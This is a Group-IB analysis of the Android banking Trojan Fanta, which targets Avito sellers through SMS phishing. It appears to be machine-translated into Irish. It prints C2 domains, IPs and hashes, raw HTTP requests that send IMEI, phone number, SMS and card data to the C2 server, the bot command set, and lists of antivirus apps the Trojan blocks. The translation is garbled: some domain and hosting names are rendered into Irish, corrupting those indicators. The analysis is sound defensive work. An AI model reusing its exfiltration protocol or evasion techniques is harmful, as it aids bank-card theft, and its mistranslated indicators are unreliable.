Lá amháin ba mhaith leat rud éigin a dhíol ar Avito agus, tar éis duit cur síos mionsonraithe ar do tháirge a phostáil (mar shampla modúl RAM), gheobhaidh tú an teachtaireacht seo:
Nuair a osclaíonn tú an nasc, feicfidh tú leathanach a bhfuil cuma neamhurchóideach air ag cur in iúl duit, an díoltóir sásta agus rathúil, go bhfuil ceannach déanta:
Nuair a chliceálann tú an cnaipe “Lean ar aghaidh”, déanfar comhad APK le deilbhín agus ainm spreagthach a íoslódáil chuig do ghléas Android. Suiteáil tú feidhmchlár a d'iarr cearta na Seirbhíse Inrochtaineachta ar chúis éigin, tháinig cúpla fuinneog ansin agus d'imigh siad go tapa agus... Sin é.
Téann tú chun d’iarmhéid a sheiceáil, ach ar chúis éigin iarrann d’aip baincéireachta sonraí do chárta arís. Tar éis duit na sonraí a iontráil, tarlaíonn rud éigin uafásach: ar chúis éigin fós doiléir duit, tosaíonn airgead ag imeacht ó do chuntas. Tá tú ag iarraidh an fhadhb a réiteach, ach ní shásaíonn do ghuthán: brúigh sé na heochracha “Ar Ais” agus “Abhaile”, ní mhúch sé agus ní cheadaíonn sé duit aon bhearta slándála a ghníomhachtú. Mar thoradh air sin, tá tú fágtha gan airgead, níor ceannaíodh do chuid earraí, tá mearbhall ort agus iontas ort: cad a tharla?
Is é an freagra simplí: tá tú tar éis éirí mar íospartach de Android Trojan Fanta, ball den teaghlach Flexnet. Conas a tharla sé seo? Mínímid anois.
Údair: Andrey Polovinkin, speisialtóir sóisearach in anailís malware, Ivan Pisarev, speisialtóir in anailís malware.
Roinnt staitisticí
Tháinig aithne ar theaghlach Flexnet de Trojans Android den chéad uair siar in 2015. Thar thréimhse measartha fada gníomhaíochta, leathnaigh an teaghlach go roinnt fospeicis: Fanta, Limebot, Lipton, etc. Ní sheasann an Traí, chomh maith leis an mbonneagar a bhaineann leis: tá scéimeanna dáileacháin éifeachtacha nua á bhforbairt - inár gcás, leathanaigh fioscaireachta ar ardchaighdeán atá dírithe ar úsáideoir-díoltóir ar leith, agus leanann forbróirí na Traí treochtaí faiseanta i scríobh víreas - ag cur feidhmiúlacht nua a fhágann gur féidir airgead a ghoid níos éifeachtaí ó fheistí ionfhabhtaithe agus meicníochtaí cosanta seachbhóthar.
Tá an feachtas a thuairiscítear san Airteagal seo dírithe ar úsáideoirí ón Rúis; taifeadadh líon beag feistí ionfhabhtaithe san Úcráin, agus níos lú fós sa Chasacstáin agus sa Bhealarúis.
Cé go bhfuil Flexnet i réimse Trojan Android le breis agus 4 bliana anois agus go ndearna go leor taighdeoirí mionstaidéar air, tá sé fós i gcruth maith. Ag tosú ó Eanáir 2019, tá an méid damáiste féideartha níos mó ná 35 milliún rúbal - agus níl sé seo ach le haghaidh feachtais sa Rúis. In 2015, díoladh leaganacha éagsúla den Trojan Android seo ar fhóraim faoi thalamh, áit a bhféadfaí cód foinse an Trojan le cur síos mionsonraithe a fháil freisin. Ciallaíonn sé seo go bhfuil na staitisticí damáiste ar fud an domhain níos suntasaí fós. Ní droch-tháscaire é do sheanfhear den sórt sin, nach ea?
Ó dhíol go dallamullóg
Mar is léir ón seat a cuireadh i láthair roimhe seo de leathanach fioscaireachta don tseirbhís Idirlín chun fógraí a phostáil Avito, ullmhaíodh é d’íospartach ar leith. De réir dealraimh, úsáideann na hionsaitheoirí ceann de pharsálaithe Avito, a bhaintear amach uimhir theileafóin agus ainm an díoltóra, chomh maith le cur síos ar an táirge. Tar éis an leathanach a leathnú agus an comhad APK a ullmhú, seoltar SMS chuig an íospartach lena ainm agus nasc chuig leathanach fioscaireachta ina bhfuil cur síos ar a tháirge agus an méid a fuarthas ó “díol” an táirge. Trí chliceáil ar an gcnaipe, faigheann an t-úsáideoir comhad APK mailíseach - Fanta.
Léirigh staidéar ar an bhfearann shcet491[.]ru go bhfuil sé tarmligthe chuig freastalaithe DNS Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Tá iontrálacha sa chomhad crios fearainn a dhíríonn ar na seoltaí IP 31.220.23[.]236, 31.220.23[.]243, agus 31.220.23[.]235. Mar sin féin, díríonn príomhthaifead acmhainne an fhearainn (Taifead) chuig freastalaí a bhfuil seoladh IP 178.132.1[.]240 aige.
Tá seoladh IP 178.132.1[.]240 lonnaithe san Ísiltír agus is leis an óstálaí é Sruth an Domhain. Tá seoltaí IP 31.220.23[.]235, 31.220.23[.]236 agus 31.220.23[.]243 lonnaithe sa RA agus is leis an bhfreastalaí óstála roinnte HOSTINGER iad. Úsáidte mar thaifeadán oscailte-ru. Réitíodh na fearainn seo a leanas freisin chuig an seoladh IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Ba chóir a thabhairt faoi deara go raibh naisc san fhormáid seo a leanas ar fáil ó bheagnach gach fearann:
http://(www.){0,1}<%domain%>/[0-9]{7}
Áiríonn an teimpléad seo nasc ó theachtaireacht SMS freisin. Bunaithe ar shonraí stairiúla, fuarthas amach go bhfreagraíonn fearann amháin do naisc éagsúla sa phatrún a thuairiscítear thuas, a thugann le fios gur úsáideadh fearann amháin chun an Traí a dháileadh ar roinnt íospartaigh.
Léimimis ar aghaidh beagán: úsáideann an Trojan a íoslódáil trí nasc ó SMS an seoladh mar fhreastalaí rialaithe onusedseddohap[.]club. Cláraíodh an fearann seo ar 2019-03-12, agus ag tosú ó 2019-04-29, rinne feidhmchláir APK idirghníomhú leis an bhfearann seo. Bunaithe ar shonraí a fuarthas ó VirusTotal, rinne 109 feidhmchlár san iomlán idirghníomhú leis an bhfreastalaí seo. Réitigh an fearann féin chuig an seoladh IP 217.23.14[.]27, atá lonnaithe san Ísiltír agus faoi úinéireacht an óstaigh Sruth an Domhain. Úsáidte mar thaifeadán NameCheap. Réitigh fearainn chuig an seoladh IP seo freisin droch-racoon[.]club (ag tosú ó 2018-09-25) agus bad-racoon[.]beo (ag tosú ó 2018-10-25). Le fearann droch-racoon[.]club d’idirghníomhaigh níos mó ná 80 comhad APK leo bad-racoon[.]beo - níos mó ná 100.
Go ginearálta, téann an t-ionsaí chun cinn mar a leanas:
Cad atá faoi chlúdach Fanta?
Cosúil le go leor Trojans Android eile, tá Fanta in ann teachtaireachtaí SMS a léamh agus a sheoladh, iarratais USSD a dhéanamh, agus a fuinneoga féin a thaispeáint ar bharr na n-iarratas (lena n-áirítear na cinn baincéireachta). Mar sin féin, tá Arsenal feidhmiúlacht an teaghlaigh seo tagtha: thosaigh Fanta ag úsáid Seirbhís Inrochtaineachta chun críocha éagsúla: ábhar fógraí ó fheidhmchláir eile a léamh, cosc a chur ar bhrath agus stop a chur le forghníomhú Trojan ar fheiste ionfhabhtaithe, etc. Oibríonn Fanta ar gach leagan de Android nach lú ná 4.4. San Airteagal seo déanfaimid breathnú níos géire ar an sampla Fanta seo a leanas:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Díreach tar éis seoladh
Díreach tar éis seoladh, seithí an Trojan a deilbhín. Ní féidir leis an bhfeidhmchlár oibriú ach amháin mura bhfuil ainm an ghléis ionfhabhtaithe ar an liosta:
- android_x86
- VirtualBox
- Nexus 5X(cinn tairbh)
- Nexus 5(razor)
Déantar an tseiceáil seo i bpríomhsheirbhís na Traí - Príomhsheirbhís. Nuair a sheoltar é den chéad uair, cuirtear paraiméadair chumraíochta an fheidhmchláir in aghaidh na luachanna réamhshocraithe (déanfar an fhormáid chun sonraí cumraíochta a stóráil agus a mbrí a phlé níos déanaí), agus cláraítear gléas ionfhabhtaithe nua ar an bhfreastalaí rialaithe. Seolfar iarratas HTTP POST leis an gcineál teachtaireachta chuig an bhfreastalaí clár_bot agus faisnéis faoin bhfeiste ionfhabhtaithe (leagan Android, IMEI, uimhir theileafóin, ainm oibreora agus cód tíre ina bhfuil an t-oibreoir cláraithe). Feidhmíonn an seoladh mar an freastalaí rialaithe hXXp://onuseseddohap[.]club/controller.php. Mar fhreagra, seolann an freastalaí teachtaireacht ina bhfuil na réimsí bot_id, bot_pwd, freastalaí — sábhálann an feidhmchlár na luachanna seo mar pharaiméadair an fhreastalaí CNC. Paraiméadar freastalaí roghnach mura bhfuarthas an réimse: úsáideann Fanta an seoladh clárúcháin - hXXp://onuseseddohap[.]club/controller.php. Is féidir an fheidhm a bhaineann le seoladh CNC a athrú a úsáid chun dhá fhadhb a réiteach: an t-ualach a dháileadh go cothrom idir roinnt freastalaithe (le líon mór feistí ionfhabhtaithe, is féidir an t-ualach ar fhreastalaí gréasáin neamhoptamaithe a bheith ard), agus freisin rogha eile a úsáid. freastalaí i gcás teipe ar cheann de na freastalaithe CNC .
Má tharlaíonn earráid agus an t-iarratas á sheoladh, déanfaidh an Trojan an próiseas clárúcháin arís tar éis 20 soicind.
Nuair a bheidh an gléas cláraithe go rathúil, taispeánfaidh Fanta an teachtaireacht seo a leanas don úsáideoir:
Nóta tábhachtach: an tseirbhís ar a dtugtar Slándáil an chórais - ainm na seirbhíse Trojan, agus tar éis cliceáil ar an gcnaipe ОК Osclófar fuinneog le socruithe Inrochtaineachta an ghléis ionfhabhtaithe, áit a gcaithfidh an t-úsáideoir cearta Inrochtaineachta a dheonú don tseirbhís mhailíseach:
Chomh luath agus a chasann an t-úsáideoir ar Seirbhís Inrochtaineachta, Faigheann Fanta rochtain ar a bhfuil i bhfuinneoga feidhmchláir agus ar na gníomhartha a dhéantar iontu:
Díreach tar éis cearta Inrochtaineachta a fháil, iarrann an Trojan cearta riarthóra agus cearta chun fógraí a léamh:
Trí úsáid a bhaint as an tSeirbhís Inrochtaineachta, déanann an feidhmchlár ionsamhladh ar eochairbhuillí, rud a thugann na cearta riachtanacha go léir dó féin.
Cruthaíonn Fanta cásanna bunachar sonraí iolracha (a gcuirfear síos orthu níos déanaí) is gá chun sonraí cumraíochta a stóráil, chomh maith le faisnéis a bhailítear sa phróiseas faoin bhfeiste ionfhabhtaithe. Chun an fhaisnéis a bhailítear a sheoladh, cruthaíonn an Trojan tasc athfhillteach atá deartha chun réimsí a íoslódáil ón mbunachar sonraí agus ordú a fháil ón bhfreastalaí rialaithe. Socraítear an t-eatramh chun CNC a rochtain ag brath ar an leagan Android: i gcás 5.1, beidh an t-eatramh 10 soicind, ar shlí eile 60 soicind.
Chun an t-ordú a fháil, déanann Fanta iarratas GetTask chuig an bhfreastalaí bainistíochta. Mar fhreagra air sin, is féidir le CNC ceann de na horduithe seo a leanas a sheoladh:
| Foireann | Cur síos |
|---|---|
| 0 | Seol teachtaireacht SMS |
| 1 | Déan glao gutháin nó ordú USSD |
| 2 | Nuashonraítear paraiméadar eatramh |
| 3 | Nuashonraítear paraiméadar bualadh |
| 6 | Nuashonraítear paraiméadar bainisteoir sms |
| 9 | Tosaigh ag bailiú teachtaireachtaí SMS |
| 11 | Athshocraigh do ghuthán chuig socruithe monarchan |
| 12 | Cumasaigh/Díchumasaigh logáil chruthú an bhosca dialóige |
Bailíonn Fanta fógraí freisin ó 70 aip bhaincéireachta, ó chórais mearíocaíochta agus ó r-sparán agus stórálann sé i mbunachar sonraí iad.
Paraiméadair chumraíochta a stóráil
Chun paraiméadair chumraíochta a stóráil, úsáideann Fanta cur chuige caighdeánach don ardán Android - sainroghanna-comhaid. Déanfar na socruithe a shábháil i gcomhad ainmnithe suímh. Tá cur síos ar na paraiméadair shábháilte sa tábla thíos.
| ainm | Luach réamhshocraithe | Luachanna féideartha | Cur síos |
|---|---|---|---|
| id | 0 | Slánuimhir | ID bot |
| freastalaí | hXXp://onuseseddohap[.]club/ | URL | Seoladh freastalaí rialaithe |
| pwd | - | teaghrán | Pasfhocal freastalaí |
| eatramh | 20 | Slánuimhir | Eatramh ama. Léiríonn sé cé chomh fada agus ba chóir na tascanna seo a leanas a chur siar:
|
| bualadh | gach | uile/uimhir theileafóin | Má tá an réimse comhionann leis an teaghrán gach nó teilUimhir, ansin beidh an teachtaireacht SMS faighte idircheapadh ag an iarratas agus ní thaispeáint don úsáideoir |
| bainisteoir sms | 0 | 0/1 | Cumasaigh/díchumasaigh an feidhmchlár mar an faighteoir réamhshocraithe SMS |
| léighDialóg | bréagach | Fíor/bréagach | Cumasaigh/Díchumasaigh logáil imeachtaí Imeacht Inrochtaineachta |
Úsáideann Fanta an comhad freisin bainisteoir sms:
| ainm | Luach réamhshocraithe | Luachanna féideartha | Cur síos |
|---|---|---|---|
| pckg | - | teaghrán | Ainm an bhainisteora teachtaireachta SMS a úsáideadh |
Idirghníomhaíocht le bunachair shonraí
Le linn a oibriú, úsáideann an Trojan dhá bhunachar sonraí. Bunachar sonraí ainmnithe a a úsáidtear chun faisnéis éagsúla a bhailítear ón bhfón a stóráil. Tá an dara bunachar sonraí ainmnithe fanta.db agus úsáidtear é chun socruithe a shábháil atá freagrach as fuinneoga fioscaireachta a chruthú atá deartha chun faisnéis a bhailiú faoi chártaí bainc.
Úsáideann Trojan bunachar sonraí а chun faisnéis bhailithe a stóráil agus do ghníomhartha a logáil. Stóráiltear sonraí i dtábla logs. Chun tábla a chruthú, úsáid an cheist SQL seo a leanas:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Tá an fhaisnéis seo a leanas sa bhunachar sonraí:
1. Logáil am tosaithe an gléas ionfhabhtaithe le teachtaireacht Chuir an fón ar siúl!
2. Fógraí ó iarratais. Gintear an teachtaireacht de réir an teimpléid seo a leanas:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Sonraí cárta bainc ó fhoirmeacha fioscaireachta cruthaithe ag an Trojan. Paraiméadar VIEW_NAME d’fhéadfadh a bheith ar cheann díobh seo a leanas:
- AliExpress
- Avito
- Google Play
- Ilghnéitheach <%App Name%>
Tá an teachtaireacht logáilte san fhormáid:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Teachtaireachtaí SMS isteach/amach san fhormáid:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Eolas faoin bpacáiste a chruthaíonn an bosca dialóige san fhormáid:
(<%Package name%>)<%Package information%>
Tábla samplach logs:
Ar cheann d’fheidhmiúlacht Fanta tá bailiú faisnéise faoi chártaí bainc. Tarlaíonn bailiú sonraí trí fhuinneoga fioscaireachta a chruthú nuair a osclaítear feidhmchláir bhaincéireachta. Ní chruthaíonn an Trojan an fhuinneog fioscaireachta ach uair amháin. Tá an fhaisnéis a taispeánadh an fhuinneog don úsáideoir stóráilte i dtábla suímh sa bhunachar sonraí fanta.db. Chun bunachar sonraí a chruthú, úsáid an cheist SQL seo a leanas:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Gach réimsí tábla suímh de réir réamhshocraithe a cuireadh tús le 1 (cruthaigh fuinneog fioscaireachta). Tar éis don úsáideoir a gcuid sonraí a iontráil, socrófar an luach go 0. Sampla de réimsí tábla suímh:
- can_logáil isteach — tá an réimse freagrach as an bhfoirm a thaispeáint agus iarratas baincéireachta á oscailt
- an chéad_bhanc - nach n-úsáidtear
- can_avito — tá an réimse freagrach as an bhfoirm a thaispeáint agus an t-iarratas Avito á oscailt
- can_ali — tá an réimse freagrach as an bhfoirm a thaispeáint agus an feidhmchlár Aliexpress á oscailt
- can_eile — tá an réimse freagrach as an bhfoirm a thaispeáint agus aon iarratas ón liosta á oscailt: Yula, Pandao, Drom Auto, Sparán. Cártaí lascaine agus bónais, Aviasales, Áirithint, Trivago
- can_chárta — tá an réimse freagrach as an bhfoirm a thaispeáint agus í á hoscailt Google Play
Idirghníomhú leis an bhfreastalaí bainistíochta
Tarlaíonn idirghníomhaíocht líonra leis an bhfreastalaí bainistíochta tríd an bprótacal HTTP. Chun oibriú leis an líonra, úsáideann Fanta an leabharlann Iarfheistithe a bhfuil tóir uirthi. Seoltar iarratais chuig: hXXp://onuseseddohap[.]club/controller.php. Is féidir seoladh an fhreastalaí a athrú agus tú ag clárú ar an bhfreastalaí. Is féidir fianáin a sheoladh mar fhreagra ón bhfreastalaí. Déanann Fanta na hiarratais seo a leanas chuig an bhfreastalaí:
- Cláraítear an bot ar an bhfreastalaí rialaithe uair amháin, ar an gcéad seoladh. Seoltar na sonraí seo a leanas faoin bhfeiste ionfhabhtaithe chuig an bhfreastalaí:
· Cookie — fianáin a fuarthas ón bhfreastalaí (teaghrán folamh é an luach réamhshocraithe)
· Modh — tairiseach teaghrán clár_bot
· réimír — tairiseach slánuimhir 2
· leagan_sdk — a fhoirmítear de réir an teimpléid seo a leanas: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI na feiste ionfhabhtaithe
· tír — cód na tíre ina bhfuil an t-oibreoir cláraithe, i bhformáid ISO
· uimhir - uimhir teileafón
· oibreoir — ainm oibreoraSampla d'iarratas a seoladh chuig an bhfreastalaí:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Mar fhreagra ar an iarratas, ní mór don fhreastalaí réad JSON a thabhairt ar ais ina bhfuil na paraiméadair seo a leanas:
· bot_id — ID na feiste ionfhabhtaithe. Má tá bot_id cothrom le 0, déanfaidh Fanta an t-iarratas a athghníomhú.
bot_pwd - pasfhocal don fhreastalaí.
freastalaí - seoladh freastalaí rialaithe. Paraiméadar roghnach. Mura sonraítear an paraiméadar, úsáidfear an seoladh a shábháiltear san iarratas.Sampla réad JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Iarratas chun ordú a fháil ón bhfreastalaí. Seoltar na sonraí seo a leanas chuig an bhfreastalaí:
· Cookie - fianáin a fuarthas ón bhfreastalaí
· tairiscint — aitheantas na feiste ionfhabhtaithe a fuarthas agus an t-iarratas á sheoladh clár_bot
· pwd - pasfhocal don fhreastalaí
· roinn_riaracháin — cinneann an réimse cibé acu an bhfuarthas cearta riarthóra. Má tá cearta riarthóra faighte, tá an réimse comhionann le 1, a mhalairt 0
· Inrochtaineacht — Stádas oibríochta na Seirbhíse Inrochtaineachta. Má cuireadh tús leis an tseirbhís, is é an luach 1, a mhalairt 0
· Bainisteoir SMS — léiríonn an bhfuil an Trojan cumasaithe mar an feidhmchlár réamhshocraithe chun SMS a fháil
· scáileán — taispeánann sé cén staid ina bhfuil an scáileán. Socrófar an luach 1, má tá an scáileán ar siúl, ar shlí eile 0;Sampla d'iarratas a seoladh chuig an bhfreastalaí:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Ag brath ar an ordú, is féidir leis an bhfreastalaí réad JSON a bhfuil paraiméadair éagsúla aige a chur ar ais:
· Foireann Seol teachtaireacht SMS: Cuimsíonn na paraiméadair an uimhir theileafóin, téacs na teachtaireachta SMS agus ID na teachtaireachta atá á seoladh. Úsáidtear an t-aitheantóir nuair a sheoltar teachtaireacht chuig an bhfreastalaí le cineál setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Foireann Déan glao gutháin nó ordú USSD: Tagann an uimhir theileafóin nó an t-ordú sa chomhlacht freagartha.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Foireann Athraigh paraiméadar eatramh.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Foireann Athraigh paraiméadar idirghabhála.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Foireann Athraigh réimse SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Foireann Bailigh teachtaireachtaí SMS ó ghléas ionfhabhtaithe.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Foireann Athshocraigh do ghuthán chuig socruithe monarchan:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Foireann Athraigh paraiméadar ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Ag seoladh teachtaireacht le cineál setSmsStatus. Déantar an t-iarratas seo tar éis an t-ordú a fhorghníomhú Seol teachtaireacht SMS. Breathnaíonn an t-iarratas mar seo:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Uaslódáil ábhar bunachar sonraí. Tarchuirtear sraith amháin in aghaidh an iarratais. Seoltar na sonraí seo a leanas chuig an bhfreastalaí:
· Cookie - fianáin a fuarthas ón bhfreastalaí
· Modh — tairiseach teaghrán setSaveInboxSms
· tairiscint — aitheantas na feiste ionfhabhtaithe a fuarthas agus an t-iarratas á sheoladh clár_bot
· téacs — téacs i dtaifead an bhunachair shonraí reatha (réimse d ón mbord logs sa bhunachar sonraí а)
· uimhir — ainm thaifead an bhunachair shonraí reatha (réimse p ón mbord logs sa bhunachar sonraí а)
· modh_sms — luach slánuimhir (réimse m ón mbord logs sa bhunachar sonraí а)Breathnaíonn an t-iarratas mar seo:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Má sheoltar chuig an bhfreastalaí go rathúil é, scriosfar an tsraith as an tábla. Sampla de réad JSON a chuir an freastalaí ar ais:
{ "response":[], "status":"ok" }
Idirghníomhú leis an tSeirbhís Inrochtaineachta
Cuireadh an tSeirbhís Inrochtaineachta i bhfeidhm chun gléasanna Android a dhéanamh níos éasca le húsáid do dhaoine faoi mhíchumas. I bhformhór na gcásanna, tá gá le hidirghníomhaíocht fhisiceach chun idirghníomhú le hiarratas. Ligeann AccessibilityService duit iad a dhéanamh de réir ríomhchláraithe. Úsáideann Fanta an tseirbhís chun fuinneoga falsa a chruthú in feidhmchláir bhaincéireachta agus chun úsáideoirí a chosc ó shocruithe córais agus roinnt feidhmchlár a oscailt.
Ag baint úsáide as feidhmiúlacht na Seirbhíse Inrochtaineachta, déanann an Trojan monatóireacht ar athruithe ar eilimintí ar scáileán an ghléis ionfhabhtaithe. Mar a thuairiscítear roimhe seo, tá paraiméadar i socruithe Fanta atá freagrach as oibríochtaí logáil le boscaí dialóige - léighDialóg. Má tá an paraiméadar seo socraithe, cuirfear faisnéis faoi ainm agus cur síos ar an bpacáiste a spreag an t-imeacht leis an mbunachar sonraí. Déanann an Traí na gníomhartha seo a leanas nuair a spreagtar imeachtaí:
- Samhlaíonn sé na heochracha cúil agus baile a bhrú sna cásanna seo a leanas:
· más mian leis an úsáideoir a ghléas a atosú
· más mian leis an úsáideoir an feidhmchlár “Avito” a scriosadh nó cearta rochtana a athrú
· má tá tagairt don fheidhmchlár “Avito” ar an leathanach
· agus an feidhmchlár Google Play Protect á oscailt
· nuair a osclaítear leathanaigh le socruithe AccessibilityService
· nuair a bhíonn an bosca dialóige um Shlándáil an Chórais le feiceáil
· nuair a osclaítear an leathanach leis na socruithe “Tarraing aip eile”.
· nuair a osclaítear an leathanach “Iarratais”, “Athshlánú agus athshocrú”, “Athshocrú Sonraí”, “Socruithe Athshocraigh”, “Painéal Forbróra”, “Speisialta. deiseanna”, “Deiseanna speisialta”, “Cearta speisialta”
· má ghin feidhmchláir áirithe an t-imeacht.Liosta iarratas
- android
- Máistir Lite
- Máistir Glan
- Glan máistir do x86 LAP
- Bainistíocht Cead Iarratais Meizu
- Slándáil MIUI
- Glan Máistir - Antivirus & Taisce agus Glantóir Dramhaíl
- Rialuithe tuismitheora agus GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Béite Slándála Gréasáin
- Glantóir Víreas, Frithvíreas, Glantóir (MAX Security)
- Soghluaiste AntiVirus Security PRO
- Avast antivirus & cosaint saor in aisce 2019
- Slándáil Soghluaiste MegaFon
- Cosaint AVG do Xperia
- Slándáil Soghluaiste
- Malwarebytes Antivirus & Cosaint
- Antivirus do Android 2019
- Máistir Slándála - Antivirus, VPN, AppLock, teanndáileog
- Meánlíon antivirus do Huawei tablet Bainisteoir Córas
- Inrochtaineacht Samsung
- Bainisteoir cliste Samsung
- Máistir Slándála
- Teanndáileog Luas
- dr.web
- Spás Slándála Dr.Web
- Ionad Rialaithe Soghluaiste Dr.Web
- Saol Spáis Dr.Web Security
- Ionad Rialaithe Soghluaiste Dr.Web
- Slándáil Antivirus & Soghluaiste
- Kaspersky Idirlín Slándáil: Antivirus agus Cosaint
- Saol ceallraí Kaspersky: Sábháil & teanndáileog
- Kaspersky Endpoint Security - cosaint agus bainistíocht
- AVG Antivirus saor in aisce 2019 - Cosaint do Android
- Android Antivirus
- Norton soghluaiste slándáil agus antivirus
- Antivirus, balla dóiteáin, VPN, slándáil soghluaiste
- Slándáil Soghluaiste: frithvíreas, VPN, cosaint gadaíochta
- Antivirus do Android saor in aisce
- Má iarrtar cead agus teachtaireacht SMS á sheoladh chuig uimhir ghearr, samhlaíonn Fanta cliceáil ar an ticbhosca Cuimhnigh rogha agus cnaipe seol.
- Nuair a dhéanann tú iarracht cearta riarthóra a bhaint den Trojan, glasann sé scáileán an ghutháin.
- Cosc ar riarthóirí nua a chur leis.
- Má tá an t-iarratas antivirus dr.web bhraitear bagairt, déanann Fanta aithris ar an gcnaipe a bhrú neamhaird.
- Samhlaíonn an Trojan an cnaipe ar ais agus baile a bhrú má bhí an t-imeacht ginte ag an bhfeidhmchlár Cúram Gléas Samsung.
- Cruthaíonn Fanta fuinneoga fioscaireachta le foirmeacha chun faisnéis a iontráil faoi chártaí bainc má sheoltar iarratas ó liosta de thart ar 30 seirbhís Idirlín éagsúla. Ina measc: AliExpress, Áirithint, Avito, Comhpháirt Margaidh Súgartha Google, Pandao, Drom Auto, etc.
Foirmeacha fioscaireachta
Déanann Fanta anailís ar na feidhmchláir atá ar siúl ar an ngléas ionfhabhtaithe. Má osclaíodh feidhmchlár spéise, taispeánann an Traí fuinneog fioscaireachta ar bharr gach ceann eile, ar foirm í chun faisnéis cárta bainc a chur isteach. Ní mór don úsáideoir na sonraí seo a leanas a chur isteach:
- Uimhir chárta
- Dáta éaga an chárta
- CVV
- Ainm shealbhóir an chárta (ní do gach banc)
Ag brath ar an bhfeidhmchlár atá ar siúl, taispeánfar fuinneoga fioscaireachta éagsúla. Seo thíos samplaí de chuid acu:
AliExpress:
Avito:
I gcás roinnt feidhmchlár eile, e.g. Margadh Súgartha Google, Aviasales, Pandao, Áirithint, Trivago:
Conas a bhí sé i ndáiríre
Go fortunately, d'éirigh leis an duine a fuair an teachtaireacht SMS cur síos air ag tús an ailt a bheith ina speisialtóir cybersecurity. Mar sin, tá an leagan fíor, neamhstiúrthóra difriúil ón gceann a dúradh níos luaithe: fuair duine SMS suimiúil, agus ina dhiaidh sin thug sé d'fhoireann Faisnéise Fiach Bagairt Grúpa-IB é. Is é toradh an ionsaí an t-alt seo. Críoch sona, ceart? Mar sin féin, ní chríochnaíonn gach scéal chomh rathúil sin, agus ionas nach mbeidh do chuid féin cosúil le gearradh stiúrthóra le caillteanas airgid, i bhformhór na gcásanna is leor cloí leis na rialacha fad-thuairiscithe seo a leanas:
- ná suiteáil feidhmchláir do ghléas soghluaiste le Android OS ó fhoinsí ar bith seachas Google Play
- Agus iarratas á shuiteáil, tabhair aird ar leith ar na cearta a iarrann an t-iarratas
- aird a thabhairt ar na síntí comhad a íoslódáil
- shuiteáil nuashonruithe Android OS go rialta
- ná tabhair cuairt ar acmhainní amhrasacha agus ná íoslódáil comhaid as sin
- Ná cliceáil ar naisc a fuarthas i dteachtaireachtaí SMS.
Foinse: will.com